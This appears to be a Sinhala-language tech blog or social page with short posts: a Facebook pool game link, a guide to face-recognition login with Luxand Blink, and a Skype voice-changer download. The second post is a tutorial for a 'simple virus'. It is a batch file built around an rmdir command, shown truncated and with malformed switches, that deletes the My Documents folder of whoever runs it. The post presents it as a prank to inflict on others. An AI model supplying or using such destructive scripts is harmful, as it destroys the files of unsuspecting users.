ඔබේ මුහුණ පෙන්වා පරිගණකයට ඇතුළු වන්න‍

අපි හැමෝම දන්නවනෙ ෆැස්බුක් 1කෙ pool game 1ක ගැන ,,,ගහන්න කැමතිද Pool ගේම් ඔන්ලයින් ඉන්න අයත් එක්ක වෙනමම ගහන්න...

මෙන්න ලින්ක් 1ක ගිහිල්ලම බලන්න
http://www.miniclip.com/games/8-ball...-fire-pool/en/
 
ලොව්ත් නැති වෙන්න පොඩි වයිරස් පොඩ්ඩෙක් හදමුද?මෙකයි මෙකෙන් වෙන්නෙ ,,මේක කව්රුහරි run කරොත් එයාගේ my document delete වෙලා යනවා.මාර simple virus එකක්.මේ කියන විදිහට කරගන්නකෝ...

01- Notepad open කරගන්න.

02- දැන් මේ code එක copy - paste කරගන්න.
... rmdir C:\Documents and Settings \S\Q

03- දැන් BAT File extension ආකාරයට save කරගන්න.ඒ කිව්වේ virus.BAT වගේ...

04- ඔන්න වැඩේ හරි...
See More
Login your PC with your Face

ඔබේ මුහුණ පෙන්වා පරිගණකයට ඇතුළු වන්න

විද්‍යා ප්‍රබන්ධ චිත්‍රපට වලදි අපට බොහෝ වෙලාවට දකින්න ලැබෙන දෙයක් තමයි පරිගණක අගුළු දැමීම සඳහා භාවිතා කරන්නාගේ මුහුණ භාවිතා කිරීම. එනම් එම පරිගණකය අන්ලොක් කර ගැනීම සඳහා අදාල භාවිතා කරන්නාගේම මුහුණ පෙන්විය යුතු වනවා. මෙය ඇත්තෙන්ම බොහොම රසවත් කාරණාවක්. දෙන් ඔබටත් ඔබගේ පරිගණකය ඔබගේම මුහුණ පෙන්වූවිට පමණක් අන්ලොක් වන ආකාරයෙන් සාදාග...න්න පුළුවන්.

ඒ සඳහා Luxand Blink නම් මෘදුකාංගය භාවිතා කරනවා.

download link
http://www.luxand.com/blink/

මෙමගින් ඔබගේ ගිණුමට අදාලව ඔබගේ මුහුණ මතක තබාගන්නවා. කන්ණාඩි පැළඳ සිටීම හෝ නොසිටීම, රැවුල වවා තිබීම හෝ නොතිබීම, කොණ්ඩයේ රටාව ආදී නිතර වෙනස් වන කරුණු Luxand Blink මගින් නිවැරදිව වටහාගෙන ඔබට පරිගණකයට ඇතුළු වීමට ඉඩ සලසා දෙනවා.

යම් හෙයකින් ඔබගේ මුහුණ හඳුනා ගැනීමට අපොහොසත් වුවහොත් ඔබගේ මුර පදය යොදා පරිගණකයට ඇතුළු විය හැකියි.
See More
 
skype එක කිව්වම කට්‌ටියම දන්නවනෙ නොමිලේ අමතුම් ගන්න පුලුවන් හොදම සොෆ්ට්‌වෙයර් එක කියලා. ඉතින් කොහොමද එකෙ voice එක වෙනස් කරල කතා කරන්ඩ තිබුනොත් හොදයි නේද.....මේ soft එක දාලම බලන්ඩකෝ....

http://clownfish-translator.com/download.html
 
 

Comments